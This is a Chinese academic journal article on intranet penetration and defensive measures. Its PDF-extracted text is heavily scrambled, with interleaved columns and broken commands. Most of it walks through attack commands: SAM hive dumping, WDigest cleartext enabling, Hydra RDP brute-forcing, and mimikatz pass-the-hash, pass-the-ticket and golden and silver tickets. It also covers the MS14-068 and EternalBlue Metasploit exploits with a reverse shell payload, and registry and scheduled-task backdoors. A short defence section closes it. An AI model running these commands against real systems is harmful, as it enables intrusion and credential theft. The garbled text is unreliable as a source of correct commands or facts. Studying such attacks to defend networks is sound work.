2023年12月1日发(作者:)

38

3

化工学院学报

Vol.38

No.3

Mar.

20212021

3

JOURNALCHEMICAL

OFINSTITUTEOF

JILIN

TECHNOLOGY

文章编号

1007-2853

2021

03-0070-08

简析内网渗透过程及防御措施

I

,

2

李双远

1

*

*

1.

吉林化工学院信息中心

吉林吉林吉林吉林

132022

2

吉林化工学院信息与控制工程学院

132022

摘要

随着信息化建设的发展与局域网的普及

企业局域网的各种核心数据及客户信息都存放在企业

的数据库中其中包括企业的核心生产技术

生产数据和企业内部信息等

由此可以看岀企业的网络安

全相当重要.主要论述内网渗透过程及相关的防御措施以此给企业网络管理人员提岀相关建议.

关键词

内网渗透

;;

信息收集横向渗透跨域攻击暴力破解

;

;

中图分类号

TP文献标志码

393.1A10.16039/22-1249.2021.03.015

DOI

随着局域网

Local

Area

Network

的应

AN

用与普及

越来越多的企业都已建设自己的内部

础上

,

攻击者通过控制该内部主机在企业内网中

进行渗透的过程及相关防御措施

.

网络

局域网

内部网络是企业内部设备之间数

据传输的重要通道

企业局域网的建设

不仅提高

了员工的工作效率

,

还在一定程度上提高了企业

1

内网信息收集

在内网渗透过程中

信息收集尤为重要

攻击

数据的安全性

但是

大多数企业只注重对企业外

部网络威胁的防御

忽略了来自企业内部的入侵

防御

攻击者就会利用企业内网环境的这一弱点

,

者可以通过信息收集获取内部网络的更多信息

,

比如系统的防火墙防护情况或主机端口开放情况

先通过一些方法取得企业内部某台设备的控制

再控制内部设备对公司内部网络进行全面渗

等等

掌握系统的信息后

可以对系统服务进行针

对式入侵

信息收集的工作量非常大

整个渗透过

程中

信息收集所花费的时间和精力是最多的

息收集这一过程

,

其实就是为接下来的渗透工作

影响企业网络安全的因素有很多

就员工层面

来讲

,

员工浏览不良网站或点击钓鱼链接等行为

造成电脑感染病毒

,

都将会使企业内网中的主机

成为攻击者攻击企业内部网络的工具

而就企业

做准备

,

收集到的信息越多

,

渗透就会越容易

,

轻松

网络管理者来讲

如果管理者的安全防范意识不

1.1

本机信息收集

本机信息收集的内容主要包括查询本机所在

内网中的位置和角色内网中存活主机发现

主机

够强

,

泄露了企业服务器或企业内部主机的登录

密码等私密信息

这些都将给企业网络安全带来

很大的安全隐患

企业内部的一台设备沦陷

就可

能会造成企业的整个系统崩溃

最后给企业带来

系统识别

开放端口探测以及防火墙配置情况

等等.

1.1.1

查询本机系统信息

无以估量的损失

由此可见

,

企业内网的安全管理

是多么的重要

企业不仅需要重视外部网络的防

也更应注重企业内部网络的安全防御

本文主

了解本机系统信息和补丁安装情况极其重

,

通过了解一台主机系统的基本信息

可以大概

猜测出内网中其他主机的系统信息和补丁情况

,

要论述在攻击者获取内网中某台主机控制权的基

收稿日期

2020-11-17

基金项目

吉林省职业技术教育学会科研课题2020XHY195

3

徐过

,

:

简析内网渗透过程及防御措施

71

如果主机系统存在漏洞

,

而他刚好又没及时安装

相应补丁

那么就可以利用该漏洞进行渗透

如果

查看共享资料

Net

view

主机是

Windows

系统

那么在命令窗口输入

systeminfo

命令就可以查询系统的配置信息

查看

arp

Arp-a

括系统型号

系统版本以及补丁情况等.

1.1.2

查询当前用户角色

查看

hosts

文件

Type

Cwindows

:

etc

system32

drivers

hosts

系统对用户的权限进行了严格的划分

权限

查看

dns

缓存

ipconfig

/

displaydns

越高

能进行的操作就越多

.Windows

系统中

限最高的是

TrustedInstallerGuest

,

权限最低的是

用户

,

Administrator

是系统管理员

,

User

为普通用

Linux

系统中权限最高的是

Root

超级管理

员用户

.

在命令窗口输入

whoami

就可以查询当前

用户所拥有的权限

.

1.1.3

查询本机信息

查询本机服务信息

wmic

servicebrief

list

查看防火墙配置

Netsh

firewall

show

config

查询当前登录域

networkstation

config

快速定位域控

ip

net

time

/

domain

查看域控制器

netgroup

domain

domaincontrollers

/

1.2存活主机探测及端口扫描

内网存活主机探测的目的是找到内网中其他

存活主机的地址

一般一个

IP

对应一台主机

口扫描是渗透前的基本准备工作攻击者的攻击

,

利用对象基本都是目标主机开放的服务

.

1.2.1

存活主机探测

探测内网存活主机的方法很多

可以使用脚

本来实现存活主机的探测

还可以通过一些工具

来探测内网存活主机

Nmap

常用的工具有

Nbtscan

SuperscanArp-scan

.

比如执行下列命

就可使用

nmap

工具探测

192.168.0

网段中的

主机

Nmap-sN

192.168.0.0/24

除了用工具发现存活主机以外

还可以通过

查看

DNS

ARP

hosts

文件等方式发现内网中

存活的一些主机

.

1.2.2

网络端口扫描

端口是主机各服务运行的主要依赖对象

击者可以通过扫描目标主机开放的端口获取目标

主机开放的网络服务程序情况

1

因为一个网络

服务程序对应一个端口

.

TCP

UDP

协议的端口

号在

0

65535

之间

一般情况下

1024

以内的端

口号对应常用的网络服务

例如

21

号端口对应

FTP

服务

,22

号端口对应

SSH

服务

3389

号端口

对应远程桌面连接服务等

可以使用

nmap

工具进

行端口扫描

2

Nmap-A

192.168.1.101/24

2

权限提升

72

2021

(1)

域用户登录时

KDC

进行预认证

(2)

AS

验证密码是否正确

如果验证通过

,

程序在操作启动前会对用户身份进行验证

.

序需要

UAC

的授权才能进行某些操作

比如访问

则返回给用户一张

TGT

票据

(3)

用户拿着服务申请

TGT

KDC

TGS

系统根目录

对重要配置文件进行读取等利用

.

UAC

提权的原理是发现高权限运行但是没有

UAC

提示的应用

再找到其启动调用时所缺失的

访问

Application

Server

的票据

(4)

,

域控的

TGS

服务验证

TGT

通过后

返回

然后添加对应的值完成提权

.

2.2.1

给域用户能够访问

Application

Server

的票据

Bypassuac

模块提权

ST

(5)

域用户拿着

ST

访问对应的

Application

假设已经获得目标机器的

meterpreter

shell

,

且当前用户在管理员组中

那接下来使用

Server;

(

Server

6)

Application

验证

ST.

客户机

1

Kerberos

协议认证过程图

下面简述

ms14-068

的问题为

TGT

作为用户凭证

包含了用户名

用户

id

所属组等信息

PAC.,PAC

简单点讲

就是验证

用户所拥有权限的特权属性证书

.

默认

PAC

是包含在

TGT

而出现

ms14-

068

这个问题的原因在于用户在申请

TGT

时可以

要求

KDC

返回的

TGT

不包含

PAC

(

include-PAC

false)

TGS_

然后用户自己构造

PAC

并放入

.

REQ

数据包中的

REQ

_

BODY

.KDC

会解密

PAC

并加密到一个新的

TGT

(

正常应该返回一

此时这个

ST)

并返回给用户

TGT

已经带入了

构造的恶意的

PAC.

利用方法

python

ms14-068.

py-u@

<

userName

><

domainName<

>-s

userSid>-d<

domainControlerAddr

":

kerberos

:

ptc

TGT_user@

exit

2.2

绕过

UAC

提权

UAC

(

User

Control

Account

)

指用户

账户控

Bypassuac

模块将用户权限提升为

System

权限

.

meterpreter

命令窗口执行以下命令

Exploit/windows/local/bypassuac

(

将返回一一

个新的

shell)

,

接着执行

"getsystem

命令将用户

权限提升为

system

权限

.

2.2.2

RunAs

模块提权

利用

RunAs

模块提权的过程和利用

Bypassuac

模块提权过程相似

.

运行会生

exploit/windows/local/ask

模块时

成一个可执行文件

,

如果目标运行程序

,

程序会请

求提升权限

,

如果用户选择继续运行

那么就会成

功获得一个更高的权限

.

2.3

Token

窃取

Token

即令牌

是描述进程或者线程安全上

下文的对象

类似于账号和密码

.

但是

Token

3

徐过

,

:

简析内网渗透过程及防御措施

73

者通过分析密码组成特征

,

利用密码组成特征分

议的登录验证

例如执行以下命令使用工具

hydra

暴力破解

ip

192.168.1.101

的机器的远程桌面

析出其他主机的密码

通过此方法获取其他主机

控制权相比其他方法要容易很多

.

3.1.1

抓取本地用户凭据

协议

,

其中的

rdp

是远程桌面协议

Hydra

192.

168.

1.txt-P

101

rdp-L

user.

password[5-7]

.txt-V

Windows

系统中

的密码由

LM

hash

NTLM

hash

两部分组成

用户名和密码等信息都保存在

3.2

远程连接

SAMC

文件中

.SAM

文件的目录为

windows

当拿到目标主机用户密码或

NTLM

Hash

.

可以通过凭据传递的方法

,

将散列值或密码传送

到目标机器中进行验证

,

与目标主机建立连接

.

system32config,

该目录存放着用户的密码

攻击

者使用以下

REG

命令就可以抓取其中的密码

hash

reg

save

hklm

sam

reg

save

hklm

system

reg

save

hklm

security

微软公司发布补丁

KB2871997,

关闭了

Wdigest

功能

从而防止用户密码以明文形式泄

但用户可以将注册表下处值改为

0

来禁用

.

HKEY

_

_

LOCAL

MACHINE

SYSTEM

CurrentControlSet

Control

SecurityProviders

WDigest

UseLogonCredential

3.1.2

hash

当拿到域控权限后

,

就可以利用工具拷贝出

C

:

中的用户然后

hash

,

再使用如

NTDSDumpEx

等工具解析

hash.

3.1.3

弱口令暴破

弱口令是最容易被利用的漏洞

攻击者通常

会使用弱口令爆破常用的默认端口

比如

ssh

223389

端口

,,

远程桌面

端口

Mysql

还有数据

3306

端口等

如果管理者设置了弱口令或者密

码强度不够

,

那么攻击者通过密码暴力破解就可

以轻轻松松获取主机控制权限

当攻击者不知道用户名和密码的时候

攻击

者就会尝试对主机的账号和密码进行暴力破解

,

其原理就是利用字典文件中的账号和密码去尝试

连接

,

当字典里的账号和密码和正确的账号和密

码匹配上时

就会返回正确结果

暴力破解主要分为以下

3

种情况主机上进行身份验证

(1)

知道登录用户名但不知道登录密码

(2)

知道登录密码但不知道登录用户名

(3)

不知道用户名和密码

暴力破解的工具有很多

常用的有

hydra

lasercrack

medusa

,

爆破工具可以爆破多种协

3.2.1

IPC

IPC(Inter

ProcessConnection

)

是为了

实现进

程间通信而开放的命名管道

.IPC

般通过验证

用户名和密码获取相应的权限

通过

ipc$,

可以访

问目标主机上的文件

不仅如此

还可以利用他在

目标机器上运行命令

.

执行以下命令

ip

192.168.1.101

的目标

主机建立

ipc$

连接

74

吉林化工学院学报

2021

运行

mimikatz,

执行以下命令

,

将实现对目标

Exploit

开始执行

主机的哈希传递攻击

Mimikatz

u

privilege

::

debug

sekurlsa

::

执行上述命令主要用于检测存在永恒之蓝漏

洞的目标主机

,

接下来执行以下命令对存在该漏

洞的目标主机进行攻击

Use

pthtest.

///

user

usernamedomain

:ntlm

com

:

d93a5def7511da3d0f2d171d9c344e91

exploit/windows/smb/msl7

_

010

3.4

票据传递攻击

_eternalblue

票据传递

Pass

The

Ticket

,PTT

攻击不同于

哈希传递攻击

,

哈希传递攻击需要管理员权限

,

之后可以输入命令

show

options

查看设置参

使用命令对

ip

193.168.1.101

的主机进行

攻击

票据传递攻击传递不需要

.

如果没获得管理员权

票据传递攻击要比哈希传递攻击容易

可以同样使用

mimikatz

工具进行票据传递

攻击

1

,

导出内存中的票据

Mimikatz

privilege

::

:

debug

sekurlsa

:

tickets

/

export

1

步完成后

目录中会新增几个票据文件

;

2

,

清除内存中的票据

Mimikatz

#

kerberos

::

purge

3

注入票据文件

Mimikatz"

kerberos

::

:

ptt

C[

ticket

0;

4f7cf

]

-2-0-60a00000-username

@

krbtgt-TEST.

3.5

永恒之蓝漏洞攻击

2017

5

名为

WannaCry

的勒索软件轰

动了整个网络安全界

影响了全球近百个国家上

千企业及公共组织

4

而与之有关的便是同年

份被曝出来的

永恒之蓝

MS17-010

漏洞

永恒

之蓝漏洞被曝出来时

威胁着全球

70%

windows

服务器的安全

该漏洞在互联网中引起

轩然大波

.

永恒之蓝漏洞利用的是在

Windows

系统中默

认开启的

SMB

服务

,

对应的端口号默认为

445

该漏洞的原理是通过向

Windows

服务器中的

SMBv1

服务发送构造的指令造成溢出

最终导致

任意命令的执行

.

现在新版的

Metasploit

都包含了

永恒之蓝漏

洞的利用模块

执行以下命令可以利用

metasploit

中的模块检测该漏洞

Auxiliary/

scanner/

smb/

smb_ms17_010

Set

rhosts

ip

地址段

设置扫描

ip

地址范围

Set

threads

401

设置线程数

,

默认为

Set

rhost

192.168.1.101

接下来设置攻击

payload,

目标主机的操作系

统不一样

,

设置的

payload

也不一样

这里需要选

择对应的

playload

:

Set

payload

windows/x64/meterprete"reverse

_tcp

Exploit

执行攻击指令

攻击成功后就会返回

一个

meterpreter

shell,

通过该

shell

就可以控制目标主机了

.

4

跨域攻击

一般大型企业都有自己的内网

为了方便管

,

根据职责的不同或功能不同

将域划分为主域

和子域

如果攻击者得到某个子域的控制权

那么

就会通过子域想方设法取得主域的控制权

3

,

:

简析内网渗透过程及防御措施

75

再输入

"powerview

命令获取父域

sid

Get-DomainComputer-Domain

断编写更高级的后门

为了逃过杀毒软件的

后门程序的种类变得多种多样

本文只介绍

最后添加一个企业管理员

,

获取父域管理

常见的几种

.

(1)

注册表注入后门

权限

.

执行以下命令有引号的位置表示是需要根

据实际信息输入的参数

kerberos

:

:

golden

/

user

:'

指定的用户

'

/

攻击者可以通过修改注册表

将后门程序路

径添加到注册表中启动并运行后门程序

修改的

注册表路径为

HKCUMicrosoft

Software

Windows

CurrentVRun

ersion

krbtgtkrbtgt

:'

'

hash

/

domainsid

:

'

当前用户名

'

/

:'/sids

当前域的

SID

''

:'

目标域的

SID

/ptt

4.2

攻击Kerberos

Kerberos

是域中的核心协议

上文介绍过

Kerberos

的工作流程

这里不做累述

当获取到

krbtgt

hash

可以通过伪造票据进行验证

.

4.2.1

金票据

金票据是伪造

Kerberos

协议中的

TGT,

Kerberos

协议验证过程中的是由

TGT

krbtgt

加密

而成

所以如果获取到

krbtgt

hash

就可以构造任

意的

TGT

.

攻击方法

Mimikatz :

kerberoskerberos

::

purge

:

goldendomain

sid

//

admin

::

administrator

:域

/

SID

/krbtgt

hashkiribi

krbtgt

/ticket

administrator.

kerberosadministrator.

:

:

ptt

kiribi

kerberos

:

:

tgt

dir

$

4.2.2

银票据

金票据是伪造

TGT

而银票据伪造的是

TGS,

原理和金票据相似

.

攻击方法

mimikatz.

domain

exe

":::

kerberos

golden

/

/sid

SID

/

target

:

域控全

称/

service

:要访问的

服务

:

cifs

/

rc4

NTLMhash

,

计算机账号

/

user

:

userdir

/ptt"

serverc

$

5

权限维持

当攻击者获取目标主机控制权后

,

为了不会

因为入侵时与目标主机建立的连接通道被管理人

员或杀毒软件关闭而失去控制权限

攻击者就会

在目标主机上留下其他更隐蔽的后门

[10]

.

随着防御软件功能的升级

操作系统后门也

一直不断升级

为了让控制权限更持久

攻击者不

当管理员登录系统时

,

后门程序会自动运行

.

(2)

计划任务后门

计划任务是指系统按照预设的任务指令执行

任务

,

而计划任务后门

,

也是如此

可以设置后门

程序的运行时间

计划任务的任务类别会因用户

权限的不同而不同

管理员权限下的用户可以设

置更多的计划任务

将后门程序的运行时间进行

修改

可以降低被目标主机发现的风险

计划运行后门的命令如下

假如将后门程序

1

h

运行

1

.

Schtasks

///

Create

/

tn

Updater

tr

sc

hourly

/

mo

1

(3)

76

2021

端口

所以针对内网信息收集的防范措施主要为

以下

3

(1)

关闭不用的端口

,

尽量减少不必要端口

任关系;

(2)

域之间建立连接时应进行多重身份

验证

;

(3)

不同域之间使用不同密码

.

的开启

;

(2)

增强防火墙的管理策略

拦截异常的

6.5

后门种植防范措施

流量

;

(3)

建立安全防护系统

对有异常行为的主

攻击者通过种植新的后门来达到持久性控制

目标主机

所以只要发现并清理攻击者留下的后

,

就可以使攻击者失去控制权•当发现未知的软

机进行通信阻断

.

6.2

权限提升防范措施

件或文件时要及时清除

,,

并且切记将残留文件清

攻击者进行提权方法一般是通过利用系统修

补的漏洞提权

系统不安全的权限分配提权和利

Token

提权

相应的防范措施有以下

6

(1)

及时给服务器打补丁

做好备份

,

才能有

效保障网站安全

,

避免黑客攻击

11

;

(2)

普通用户或程序给予普通权限

,

不要轻

易将管理员权限分配给用户

;

(3)

不要运行未知安全的软件

也不要下载

或传播来路不明的文件

(4)

缩短

Token

的有效时长

(5)

增强

Token

的验证方法以及安全管理

(6)

将密码放在只有管理员权限才能访问的

文件中

.

6.3

针对横向渗透的防范措施

攻击者进行横向渗透的核心是密码

所以主

要的防范策略也是以密码安全管理为中心

而攻

击者进行横向渗透使用最多的方法是密码暴力破

解和密码碰撞

所以

企业网络运维人员可以通过

以下

5

个方法进行防范

(1)

不选择常用的邮箱以及手机号作为密

密码最好不要进行反复的使用

,

通常情况多使

用不固定的邮箱进行手机业务的交互

12

(

2)

针对

Kerberoast

攻击

,

确保密码长度超过

25

;

(3)

Kerberos

票据使用

AES256_HMAC

加密

3

徐过

,

:

简析内网渗透过程及防御措施

77

[2]王小妹陈红松陈学平

.[

网络安全与管理实验教程

[M].

[8]

李明

.计算机网络安全与应用M].

北京

:

:

清华大学岀版社

,2015.学工业岀版社,2012.

[3]徐扬,王江涛陈志刚邓晓衡

[9]基于伪

苑津莎高会生.

ID

.

认证普适计算中一种上下文感

RFID

,

协议及串空间证明[J].通信学报

计算机科学2012(11)

2017

(10)

142-146,176.

[4]

网络攻防技术与实战深入理解信息安全防护

知的自适应可信模型

[J].

41-48,56.

郭帆

.

[10]

武新华

王英英李伟

.[M].

网络渗透技术攻防高手修炼

体系

[M].

北京清华大学岀版社

:

,2018,9.

[5]注入到服务器网络空间安全技术实

北京

电子工业岀版社

,2011.

[11]才海龙SQL王小军胡耿然

李双远

王偶师

,

.

吕秋云

.

践教程

[M].

西安:

西安电子科技大学岀版社

,2017.

沦陷全过程剖析

[J].,2010,27

吉林化工学院学报

(4)

48-51.

[

12谈国胜[J].

]

李双远

.

面向

Web

的攻击方式及防御对策

[6]

陈小兵

.

完全之路渗透技术及实战案例解析

WEB

[M].

2

,2015.

北京

电子工业岀版社

[7]刘晨

陈小兵

黄小波

.

黑客攻防实战加密与解密

[

M].

北京

电子工业岀版社

,2016.

吉林化工学院学报

,2019,36(3)

47-53.

Brief

Internal

Analysis

of

Network

Penetration

Process

and

Defense

Measures

XU

Guo

1,2

,LI

Shuangyuan

1

*

( JilinControl

1

Information

.

of

Serviceof China;

Center,

Jilin

InstituteTechnology,

Chemical 2.Information

132022,School

and

Engineering,Jilin

Institute

of132022,China)

Chemical

Technology,Jilin

Abstract

:ofofof

With

theinformationthethe

development,

constructionpopularization

and

LAN

most

core

dataenterprisesstored

andincluding

customerareinthethe

information

ofof

database

enterprises,

core

production

technology,production

datait

andinternalbe

enterprise

information,etc.,from

which

canseen

that

thethe

network

securityimportant.

ofinternal

enterprisesof

is

how Thispapermainlynetwork

discusses

process

penetration

and

relevantasgiverelevant

defense

measures,so

toto

Suggestionsmanagers.

enterprise

network

Keywords

Network

infiltration;informationpenetration;cross-domain-attack;brute

collection;transverseforce